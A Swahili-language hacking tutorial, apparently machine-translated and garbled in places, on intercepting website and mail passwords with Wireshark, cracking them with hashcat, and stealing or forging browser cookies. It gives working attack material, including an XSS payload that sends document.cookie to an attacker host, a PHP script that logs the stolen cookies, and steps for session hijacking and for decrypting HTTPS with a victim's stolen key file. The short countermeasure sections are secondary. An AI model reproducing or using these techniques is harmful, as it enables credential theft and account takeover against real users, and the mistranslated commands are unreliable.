Watumiaji wengi hawatambui kuwa kwa kujaza kuingia na nenosiri wakati wa kusajili au kuidhinisha kwenye rasilimali iliyofungwa ya Mtandao na kubonyeza ENTER, data hii inaweza kuzuiwa kwa urahisi. Mara nyingi hupitishwa kwenye mtandao kwa fomu isiyolindwa. Kwa hiyo, ikiwa tovuti unayojaribu kuingia hutumia itifaki ya HTTP, basi ni rahisi sana kukamata trafiki hii, kuchambua kwa kutumia Wireshark, na kisha kutumia filters maalum na programu ili kupata na kufuta nenosiri.

Mahali bora ya kukataza nywila ni msingi wa mtandao, ambapo trafiki ya watumiaji wote huenda kwenye rasilimali zilizofungwa (kwa mfano, barua) au mbele ya router ili kufikia mtandao, wakati wa kujiandikisha kwenye rasilimali za nje. Tunaweka kioo na tuko tayari kujisikia kama mdukuzi.

Hatua ya 1. Sakinisha na uzindue Wireshark ili kunasa trafiki

Wakati mwingine, ili kufanya hivyo, inatosha kuchagua tu interface ambayo tunapanga kukamata trafiki na bonyeza kitufe cha Anza. Kwa upande wetu, tunakamata mtandao wa wireless.

Ukamataji wa trafiki umeanza.

Hatua ya 2. Kuchuja trafiki ya POST iliyonaswa

Tunafungua kivinjari na jaribu kuingia kwenye rasilimali fulani kwa kutumia jina la mtumiaji na nenosiri. Baada ya mchakato wa uidhinishaji kukamilika na tovuti kufunguliwa, tunaacha kukamata trafiki katika Wireshark. Ifuatayo, fungua analyzer ya itifaki na uone idadi kubwa ya pakiti. Hapa ndipo wataalamu wengi wa TEHAMA wanapokata tamaa kwa sababu hawajui la kufanya baadaye. Lakini tunajua na tunavutiwa na vifurushi maalum ambavyo vina data ya POST ambayo hutolewa kwenye mashine yetu ya karibu wakati wa kujaza fomu kwenye skrini na kutumwa kwa seva ya mbali tunapobofya kitufe cha "Ingia" au "Idhini" kwenye kivinjari.

Tunaingiza kichujio maalum kwenye dirisha ili kuonyesha pakiti zilizokamatwa: http.ombi.mbinu == "POST"

Na tunaona, badala ya maelfu ya vifurushi, ni moja tu iliyo na data tunayotafuta.

Hatua ya 3. Pata kuingia kwa mtumiaji na nenosiri

Bofya kulia kwa haraka na uchague kipengee kutoka kwenye menyu Fuata TCP Steam

Baada ya hayo, maandishi yataonekana kwenye dirisha jipya ambalo linarejesha yaliyomo kwenye ukurasa katika msimbo. Wacha tupate sehemu "nenosiri" na "mtumiaji", ambazo zinalingana na nywila na jina la mtumiaji. Katika hali nyingine, sehemu zote mbili zitasomeka kwa urahisi na hata hazijasimbwa, lakini ikiwa tunajaribu kunasa trafiki wakati wa kupata rasilimali zinazojulikana kama Mail.ru, Facebook, VKontakte, nk, basi nenosiri litasimbwa:

HTTP/1.1 302 Imepatikana

Seva: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

P3P: CP="NOI ADM DEV PSAI COM NAV DEM YETU YA ORo STP IND"

Set-Cookie: password= ; expires=Thu, 07-Nov-2024 23:52:21 GMT; njia=/

Mahali: loggedin.php

Urefu wa Maudhui: 0

Uunganisho: karibu

Aina ya Maudhui: maandishi/html; charset=UTF-8

Kwa hivyo, katika kesi yetu:

Jina la mtumiaji: networkguru

Nenosiri:

Hatua ya 4. Tambua aina ya usimbaji ili kusimbua nenosiri

Kwa mfano, nenda kwenye tovuti http://www.onlinehashcrack.com/hash-identification.php#res na uweke nenosiri letu kwenye dirisha la kitambulisho. Nilipewa orodha ya itifaki za usimbuaji kwa mpangilio wa kipaumbele:

Hatua ya 5. Kusimbua nenosiri la mtumiaji

Katika hatua hii tunaweza kutumia matumizi ya hashcat:

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

Kwenye pato tulipokea nenosiri lililosimbwa: nenosiri rahisi

Kwa hivyo, kwa msaada wa Wireshark, hatuwezi tu kutatua shida katika utendakazi wa programu na huduma, lakini pia jaribu sisi wenyewe kama mdukuzi, kuingilia nywila ambazo watumiaji huingiza katika fomu za wavuti. Unaweza pia kujua manenosiri ya visanduku vya barua vya watumiaji kwa kutumia vichungi rahisi kuonyesha:

• Itifaki ya POP na kichujio inaonekana kama hii: pop.request.command == "USER" || pop.request.command == "PASS"
• Itifaki ya IMAP na kichujio kitakuwa: ombi la imap lina "kuingia"
• Itifaki ni SMTP na utahitaji kuingiza kichujio kifuatacho: smtp.req.command == "AUTH"

na huduma mbaya zaidi za kusimbua itifaki ya usimbaji.

Hatua ya 6: Je, ikiwa trafiki imesimbwa kwa njia fiche na kutumia HTTPS?

Kuna chaguzi kadhaa za kujibu swali hili.

Chaguo 1. Unganisha wakati muunganisho kati ya mtumiaji na seva umevunjika na unasa trafiki wakati muunganisho umeanzishwa (SSL Handshake). Muunganisho unapoanzishwa, ufunguo wa kikao unaweza kuzuiwa.

Chaguo la 2: Unaweza kusimbua trafiki ya HTTPS kwa kutumia faili ya kumbukumbu ya ufunguo wa kipindi iliyorekodiwa na Firefox au Chrome. Ili kufanya hivyo, kivinjari lazima kisanidi kuandika funguo hizi za usimbuaji kwenye faili ya kumbukumbu (mfano wa msingi wa Firefox) na unapaswa kupokea faili hiyo ya kumbukumbu. Kimsingi, unahitaji kuiba faili muhimu ya kikao kutoka kwa diski kuu ya mtumiaji mwingine (ambayo ni kinyume cha sheria). Naam, kisha kamata trafiki na utumie ufunguo unaotokana ili usimbue.

Ufafanuzi. Tunazungumza kuhusu kivinjari cha wavuti cha mtu ambaye nenosiri lake wanajaribu kuiba. Ikiwa tunamaanisha kufuta trafiki yetu wenyewe ya HTTPS na kutaka kufanya mazoezi, basi mkakati huu utafanya kazi. Ikiwa unajaribu kusimbua trafiki ya HTTPS ya watumiaji wengine bila ufikiaji wa kompyuta zao, hii haitafanya kazi - hiyo ni usimbaji fiche na faragha.

Baada ya kupokea funguo kulingana na chaguo 1 au 2, unahitaji kuzisajili kwenye WireShark:

1. Nenda kwenye menyu Hariri - Mapendeleo - Itifaki - SSL.
2. Weka bendera "Kusanya upya rekodi za SSL zinazojumuisha sehemu nyingi za TCP".
3. "Orodha ya funguo za RSA" na ubofye Hariri.
4. Ingiza data katika nyanja zote na uandike njia kwenye faili na ufunguo

Picha inaonyesha kuwa kidakuzi kina mstari wordpress_logged_in_263d663a02379b7624b1028a58464038=admin. Thamani hii iko katika umbo ambalo halijasimbwa kwenye kidakuzi na inaweza kunaswa kwa urahisi kwa kutumia matumizi ya Achilles, lakini katika hali nyingi katika Achilles unaweza kuona tu heshi ya ingizo fulani. Kabla ya kutuma ombi kwa seva, unaweza kujaribu kubadilisha mstari huu na yoyote sawa (ingawa katika kesi hii hakuna uhakika) - idadi ya majaribio sio mdogo. Kisha, kwa kutuma ombi hili kwa seva kwa kutumia kitufe cha Tuma, unaweza kupokea jibu kutoka kwa seva iliyokusudiwa kwa msimamizi.

Katika mfano uliopita, unaweza kutumia udanganyifu wa kitambulisho cha mtumiaji wa moja kwa moja. Kwa kuongezea, jina la kigezo, ambacho uingizwaji wake wa thamani hutoa fursa za ziada kwa mdukuzi, unaweza kuwa ufuatao: mtumiaji (kwa mfano, USER=JDOE), usemi wowote wenye mfuatano wa kitambulisho (kwa mfano, USER=JDOE au SESSIONID= BLAHBLAH), msimamizi (kwa mfano, ADMIN= TRUE), kipindi (kwa mfano, KIKAO=INACHOENDELEA), mkokoteni (kwa mfano, GARI=KAMILI), pamoja na misemo kama vile TRUE, FALSE, ACTIVE, NOT ACTIVE. Kwa kawaida, muundo wa vidakuzi unategemea sana programu ambayo hutumiwa. Walakini, vidokezo hivi vya kutafuta dosari za programu kwa kutumia vidakuzi vinatumika kwa karibu miundo yote.

Hatua za kukabiliana na upande wa mteja dhidi ya uchimbaji wa vidakuzi

Kwa ujumla, watumiaji wanapaswa kuwa waangalifu na Tovuti zinazotumia vidakuzi kwa uthibitishaji na kuhifadhi data nyeti. Inafaa pia kukumbuka kuwa Wavuti inayotumia vidakuzi kwa uthibitishaji lazima iunge mkono angalau itifaki ya SSL ili kusimba jina la mtumiaji na nywila, kwani kwa kukosekana kwa itifaki hii, data hupitishwa bila kufichwa, ambayo inafanya uwezekano wa kuizuia. kutumia zana rahisi za programu kutazama data inayotumwa kupitia mtandao.

Programu ya Kookaburra imeunda zana ya kuwezesha matumizi ya vidakuzi. Chombo hicho kinaitwa CookiePal ( http://www.kburra.com/cpal.html (tazama www.kburra.com)) Mpango huu umeundwa ili kumtahadharisha mtumiaji wakati Tovuti inapojaribu kusakinisha kuki kwenye mashine, na mtumiaji anaweza kuruhusu au kukataa kitendo hiki. Vitendaji sawa vya kuzuia vidakuzi vinapatikana katika vivinjari vyote leo.

Sababu nyingine ya kusasisha mara kwa mara sasisho za kivinjari cha Wavuti ni kwamba dosari za usalama katika programu hizi zinatambuliwa kila wakati. Kwa hivyo, Bennet Haselton na Jamie McCarthy waliunda hati ambayo, baada ya kubofya kiungo, hupata vidakuzi kutoka kwa mashine ya mteja. Kwa hivyo, maudhui yote ya vidakuzi vilivyo kwenye mashine ya mtumiaji yanapatikana.

Aina hii ya utapeli pia inaweza kufanywa kwa kutumia mpini

Ili kuhakikisha kuwa vitu kama hivyo havitishii data yetu ya kibinafsi, mimi hufanya hivi mwenyewe na kushauri kila mtu kusasisha programu inayofanya kazi na nambari ya HTML kila wakati (wateja wa barua-pepe, vicheza media, vivinjari, nk).

Watu wengi wanapendelea tu kuzuia vidakuzi, lakini Tovuti nyingi zinahitaji vidakuzi kuvinjari. Hitimisho - ikiwa katika siku za usoni teknolojia ya ubunifu inaonekana ambayo hukuruhusu kufanya bila kuki, waandaaji wa programu na wasimamizi watapumua, lakini kwa sasa vidakuzi vinabaki kuwa kipande kitamu kwa hacker! Hii ni kweli, kwani njia mbadala bora bado haipo.

Hatua za kukabiliana na seva

Katika kesi ya mapendekezo ya kuhakikisha usalama wa seva, wataalam wanatoa ushauri mmoja rahisi: usitumie utaratibu wa kuki isipokuwa lazima kabisa! Uangalifu hasa unapaswa kuchukuliwa unapotumia vidakuzi ambavyo vinasalia kwenye mfumo wa mtumiaji baada ya mwisho wa kipindi cha mawasiliano.

Bila shaka, ni muhimu kuelewa kwamba vidakuzi vinaweza kutumika kutoa usalama kwa seva za Wavuti kwa uthibitishaji wa mtumiaji. Ikiwa programu yako inahitaji kutumia vidakuzi, unapaswa kusanidi utaratibu wa vidakuzi kutumia vitufe tofauti vya muda mfupi kwa kila kipindi, na ujaribu kutoweka taarifa katika faili hizi ambazo zinaweza kutumiwa na wadukuzi kwa udukuzi (kama vile ADMIN=TRUE) .

Zaidi ya hayo, ili kufanya matumizi yako ya vidakuzi kuwa salama zaidi, unaweza kutumia usimbaji fiche wa vidakuzi ili kuzuia taarifa nyeti kutolewa. Bila shaka, usimbaji fiche hausuluhishi matatizo yote ya usalama wakati wa kufanya kazi na teknolojia ya vidakuzi, lakini njia hii itazuia udukuzi wa kimsingi ulioelezwa hapo juu.

Kuki ni nini?

Kuna utaratibu unaoruhusu seva ya http kuhifadhi habari fulani ya maandishi kwenye kompyuta ya mtumiaji na kisha kuipata. Habari hii inaitwa kuki. Kimsingi, kila kuki ni jozi: jina la parameta na thamani yake. Kila kidakuzi pia kimepewa kikoa ambacho kinamiliki. Kwa sababu za usalama, katika vivinjari vyote seva ya http inaruhusiwa tu kufikia kidakuzi cha kikoa chake. Zaidi ya hayo, vidakuzi vinaweza kuwa na tarehe ya mwisho wa matumizi, katika hali ambayo vitahifadhiwa kwenye kompyuta hadi tarehe hii, hata ukifunga madirisha yote ya kivinjari.

Kwa nini vidakuzi ni muhimu?

Mifumo yote ya watumiaji wengi hutumia vidakuzi kutambua mtumiaji. Kwa usahihi, uunganisho wa sasa wa mtumiaji kwa huduma, kikao cha mtumiaji. Mtu akitambua vidakuzi vyako, ataweza kuingia kwenye mfumo kwa niaba yako. Kwa sababu kwa sasa rasilimali chache sana za Mtandao huangalia mabadiliko ya anwani ya IP wakati wa kipindi kimoja cha mtumiaji.

Jinsi ya kubadilisha au kubadilisha vidakuzi?

Wasanidi wa kivinjari hawatoi zana zilizojengewa ndani za kuhariri vidakuzi. Lakini unaweza kupata na notepad ya kawaida.

Hatua ya 1: unda faili ya maandishi na maandishi

Toleo la Mhariri wa Usajili wa Windows 5.00



@="C:\\IE_ext.htm"

Ihifadhi chini ya jina IE_ext.reg

Hatua ya 2: Kwa kutumia faili iliyoundwa, ongeza mabadiliko kwenye Usajili wa Windows.

Hatua ya 3: unda faili ya maandishi na maandishi

< script language="javascript">
external.menuArguments.clipboardData.setData("Nakala" , external.menuArguments.document.cookie);

Menu.MenuHoja.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
tahadhari(external.menuArguments.document.cookie);

Ihifadhi chini ya jina C:\IE_ext.htm

Hatua ya 4: Tunaenda kwenye tovuti tunayovutiwa nayo.

Hatua ya 5: Bofya kulia kwenye nafasi tupu kwenye ukurasa na uchague kipengee cha menyu "Kufanya kazi na Vidakuzi". Ruhusu ufikiaji wa ubao wa kunakili. Vidakuzi vyako kutoka kwa tovuti hii vitaenda kwenye ubao wa kunakili. Unaweza kuingiza daftari zao na uangalie.

Hatua ya 6: Ili kubadilisha baadhi ya vidakuzi, hariri faili C:\IE_ext.htm, ukibadilisha jina la mtihani kwa jina la keki, thamani ya mtihani- kwa maana yake, testdomain.ru- kwa kikoa cha tovuti. Ikiwa ni lazima, ongeza mistari zaidi sawa. Kwa urahisi wa udhibiti, niliongeza kwenye hati matokeo ya vidakuzi vya sasa kabla na baada ya mabadiliko: tahadhari(external.menuArguments.document.cookie);

Hatua ya 7: Tekeleza Hatua ya 5 tena, kisha uonyeshe upya ukurasa.

Mstari wa chini: tutafikia rasilimali hii ya Mtandao na vidakuzi vilivyosasishwa.

Jinsi ya kuiba vidakuzi kwa kutumia JavaScript?

Ikiwa mshambulizi ataweza kupata fursa ya kutekeleza hati ya JavaScript kwenye kompyuta ya mwathiriwa, basi anaweza kusoma vidakuzi vya sasa kwa urahisi sana. Mfano:

var str= document.cookie;

Lakini ataweza kuzihamisha kwenye tovuti yake, kwa sababu, kama nilivyoonyesha hapo awali, hati ya JavaScript haitaweza kufikia tovuti iliyoko kwenye kikoa tofauti bila uthibitisho wa ziada? Inabadilika kuwa hati ya JavaScript inaweza kupakia picha yoyote iliyo kwenye seva yoyote ya http. Wakati huo huo, uhamishe habari yoyote ya maandishi katika ombi la kupakua kwenye picha hii. Mfano: http://hackersite.ru/xss.jpg?text_info Kwa hivyo ikiwa utaendesha nambari hii:

var img= Picha mpya();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(document.cookie);

basi kuki itaisha katika ombi la kupakua "picha" na "itakwenda" kwa mshambuliaji.

Jinsi ya kushughulikia maombi kama haya kupakua "picha"?

Mshambulizi anahitaji tu kupata mwenyeji kwa usaidizi wa PHP na kuweka nambari kama hii hapo:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Kisha vigezo vyote vya ombi kwa hati hii vitahifadhiwa kwenye faili log.txt. Kilichobaki ni kuchukua nafasi ya hati ya JavaScript iliyoelezewa hapo awali http://hackersite.ru/xss.jpg kwa njia ya hati hii ya php.

Mstari wa chini

Nilionyesha njia rahisi tu ya kutumia udhaifu wa XSS. Lakini hii inathibitisha kuwa uwepo wa angalau hatari moja kama hiyo kwenye tovuti ya watumiaji wengi ya Mtandao inaweza kuruhusu mshambulizi kutumia rasilimali zake kwa niaba yako.

Je, umewahi kujiuliza jinsi baadhi ya Tovuti hubinafsisha wageni wao? Hii inaweza kuonyeshwa, kwa mfano, kwa kukumbuka yaliyomo kwenye "gari" (ikiwa nodi hii inalenga kuuza bidhaa) au kwa njia ya kujaza mashamba ya fomu fulani. Itifaki ya HTTP ambayo inasimamia utendakazi wa Mtandao Wote wa Ulimwenguni haina njia ya kufuatilia matukio kutoka kwa ziara moja hadi tovuti hadi nyingine, kwa hiyo nyongeza maalum ilitengenezwa ili kuweza kuhifadhi "majimbo" hayo. Utaratibu huu, uliofafanuliwa katika RFC 2109, huweka vipande maalum vya data ya vidakuzi kwenye maombi na majibu ya HTTP ambayo huruhusu Tovuti kufuatilia wageni wao.

Data ya vidakuzi inaweza kuhifadhiwa kwa muda wa kipindi cha mawasiliano ( kwa kikao), iliyobaki kwenye RAM kwa kikao kimoja na kufutwa wakati kivinjari kimefungwa, au hata baada ya muda maalum kupita. Katika hali zingine ni za kudumu ( kuendelea), iliyobaki kwenye diski kuu ya mtumiaji kama faili ya maandishi. Kawaida huhifadhiwa kwenye saraka ya Vidakuzi (%windir%\Cookies kwenye Win9x na %userprofile%\Cookies kwenye NT/2000). Si vigumu kukisia kwamba baada ya kunasa vidakuzi kwenye mtandao, mshambulizi anaweza kuiga mtumiaji wa kompyuta fulani, au kukusanya taarifa muhimu zilizo katika faili hizi. Baada ya kusoma sehemu zifuatazo, utaelewa jinsi ilivyo rahisi kufanya.

Vidakuzi vya kuki

Njia ya moja kwa moja ni kukatiza vidakuzi vinapopitishwa kwenye mtandao. Data iliyozuiliwa inaweza kutumika wakati wa kuingia kwenye seva inayofaa. Tatizo hili linaweza kutatuliwa kwa kutumia matumizi yoyote ya pakiti ya kuingilia, lakini mojawapo bora zaidi ni programu ya Lavrenty Nikula ( Laurentiu Nicula) SpyNet/PeepNet. SpyNet inajumuisha huduma mbili zinazofanya kazi pamoja. Mpango CaptureNet inachukua pakiti yenyewe na kuihifadhi kwenye diski, na matumizi ya PeepNet hufungua faili na kuibadilisha kuwa muundo unaoweza kusomeka na binadamu. Mfano ufuatao ni kipande cha kipindi cha mawasiliano kilichoundwa upya na PeepNet, ambapo kidakuzi hutumika kuthibitisha na kudhibiti ufikiaji wa kurasa zinazotazamwa (majina yamebadilishwa ili kudumisha kutokujulikana).

PATA http://www.victim.net/images/logo.gif HTTP/1.0 Kubali: */* Referrer: http://www.victim.net/ Mwenyeji: www.victim.net Cookie: jrunsessionid=96114024278141622; cuid=TORPM!ZXTFRLRlpWTVFISEblahblah

Mfano hapo juu unaonyesha kipande cha vidakuzi kilichowekwa kwenye ombi la HTTP kinachokuja kwa seva. Muhimu zaidi ni shamba ujazo=, ambayo hubainisha kitambulisho cha kipekee kinachotumika kwa uthibitishaji wa mtumiaji kwenye nodi ya www.victim.net. Wacha tuseme kwamba baada ya hii mshambuliaji alitembelea node ya victim.net, alipokea kitambulisho chake mwenyewe na kuki (kwa kuzingatia kwamba node haitoi data ya kuki kwenye kumbukumbu ya kawaida, lakini huiandika kwa gari ngumu). Mshambulizi kisha anaweza kufungua kidakuzi chake na kubadilisha kitambulisho cha sehemu ya cuid= kutoka kwa pakiti iliyonaswa. Katika hali hii, wakati wa kuingia kwenye seva ya victim.net, atatambuliwa kama mtumiaji ambaye data yake ya kidakuzi ilinaswa.

Uwezo wa programu PeepNet kurejesha kikao chote cha mawasiliano au kipande chake hurahisisha sana utekelezaji wa mashambulizi ya aina hii. Kwa kutumia kitufe Nenda kachukue! Unaweza kuleta tena kurasa ambazo mtumiaji alitazama kwa kutumia data ya kidakuzi chake kilichonaswa hapo awali na CaptureNet. Katika sanduku la mazungumzo la matumizi ya PeepNet unaweza kuona habari kuhusu maagizo yaliyokamilishwa ya mtu. Hii hutumia data ya kidakuzi iliyonaswa na CaptureNet kwa uthibitishaji. Kumbuka fremu iliyo kwenye kona ya chini ya kulia ya kisanduku cha mazungumzo ya data ya kikao na mstari unaofuata Kidakuzi: mstari. Hii ndiyo data ya kidakuzi inayotumika kuthibitisha.

Ni mbinu nadhifu kabisa. Aidha, shirika CaptureNet inaweza kutoa rekodi kamili iliyosimbwa ya trafiki, ambayo ni karibu sawa na uwezo wa huduma za daraja la kitaaluma kama vile Network Associates, Inc.'s Sniffer Pro. Hata hivyo, shirika SpyNet Bora zaidi - unaweza kuipata bila malipo!

Hatua za kupinga

Unapaswa kuwa mwangalifu na tovuti zinazotumia vidakuzi kwa uthibitishaji na kuhifadhi maelezo nyeti ya utambulisho. Zana moja inayoweza kusaidia kwa usalama ni Cookie Pal ya Programu ya Kookaburra, ambayo inaweza kupatikana katika http://www.kburra.com/cpal.html. Bidhaa hii ya programu inaweza kusanidiwa ili kutoa ujumbe wa onyo kwa mtumiaji wakati Tovuti inapojaribu kutumia utaratibu wa vidakuzi. Katika kesi hii, unaweza "kuangalia nyuma ya pazia" na kuamua ikiwa vitendo hivi vitaruhusiwa. Internet Explorer ina utaratibu wa kuki iliyojengewa ndani. Ili kuiwasha, zindua programupulizi ya Chaguzi za Mtandao kwenye Paneli ya Kudhibiti, nenda kwenye kichupo cha Usalama, chagua kipengee cha Eneo la Mtandao, weka hali ya Kiwango Maalum, na kwa data ya kudumu na ya muda ya vidakuzi, weka swichi hadi Upesi. Kuweka matumizi ya vidakuzi kwenye kivinjari cha Netscape hufanywa kwa kutumia amri Hariri › Mapendeleo › Kina na kuweka Nionye kabla ya kukubali kidakuzi au Zima hali ya vidakuzi (Mchoro 16.3). Unapokubali kuki, unahitaji kuangalia ikiwa imeandikwa kwa diski na kuona kama Tovuti inakusanya taarifa kuhusu watumiaji.

Unapotembelea tovuti inayotumia vidakuzi kwa uthibitishaji, lazima uhakikishe kuwa jina la mtumiaji na nenosiri ulilotoa mwanzoni ni angalau limesimbwa kwa njia fiche ya SSL. Kisha habari hii itaonekana kwenye dirisha la programu ya PeepNet, angalau si kwa namna ya maandishi wazi.

Waandishi wangependelea kuepuka vidakuzi kabisa ikiwa Tovuti nyingi zinazotembelewa mara kwa mara hazihitaji chaguo hili. Kwa mfano, kwa huduma maarufu duniani kote ya Hotmail ya Microsoft, vidakuzi vinahitajika kwa usajili. Kwa sababu huduma hii hutumia seva kadhaa tofauti wakati wa mchakato wa uthibitishaji, kuziongeza kwenye eneo la Tovuti Zinazoaminika sio rahisi sana (mchakato huu umeelezewa katika sehemu ya "Kutumia Maeneo ya Usalama kwa Hekima: Suluhisho la Kawaida kwa Tatizo la Udhibiti wa Active"). Katika kesi hii, jina *.hotmail.com litasaidia. Vidakuzi si suluhisho kamili kwa tatizo la kutokamilika kwa itifaki ya HTML, lakini mbinu mbadala zinaonekana kuwa mbaya zaidi (kwa mfano, kuongeza kitambulisho kwenye URL, ambacho kinaweza kuhifadhiwa kwenye seva mbadala). Hadi wazo bora lije, chaguo lako pekee ni kudhibiti vidakuzi vyako kwa kutumia mbinu zilizoorodheshwa hapo juu.

Nasa vidakuzi kupitia URL

Hebu tufikirie jambo baya: Watumiaji wa Internet Explorer bonyeza viungo vilivyoundwa mahususi na kuwa wahasiriwa wanaowezekana, wakihatarisha vidakuzi vyao kuingiliwa. Bennett Haselton ( Bennett Haselton) na Jamie McCarthy ( Jamie McCarthy) kutoka kwa shirika la vijana Peacefire, ambalo linatetea uhuru wa mawasiliano kupitia Mtandao, lilichapisha hati inayoleta wazo hili kuwa hai. Hati hii hurejesha vidakuzi kutoka kwa kompyuta ya mteja wakati mtumiaji wake anapobofya kiungo kilicho kwenye ukurasa huu. Kama matokeo, yaliyomo kwenye kidakuzi hupatikana kwa waendeshaji wa wavuti.

Kipengele hiki kinaweza kutumiwa vibaya kwa madhumuni machafu kwa kupachika lebo za IFRAME katika HTML ya ukurasa wa Wavuti, barua pepe ya HTML, au chapisho la kikundi cha habari. Mfano ufuatao, uliotolewa na mshauri wa usalama Richard M. Smith, unaonyesha uwezo wa kutumia vishikizo vya IFRAME na shirika lililotengenezwa na Peacefire.